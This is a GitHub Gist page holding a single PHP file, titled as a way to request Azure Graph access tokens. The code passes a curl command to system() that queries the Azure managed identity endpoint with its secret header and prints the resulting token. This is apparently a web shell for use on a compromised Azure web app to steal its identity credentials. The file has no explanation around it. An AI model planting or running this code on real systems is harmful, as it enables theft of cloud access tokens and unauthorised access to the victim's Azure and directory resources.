Created
January 3, 2023 18:16
-
-
Save C0axx/129c257f38d410c876abb5b1c8215651 to your computer and use it in GitHub Desktop.
Request access tokens for Azure Graph services
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
system('curl "$IDENTITY_ENDPOINT?resource=https://graph.windows.net/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER'); | |
?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment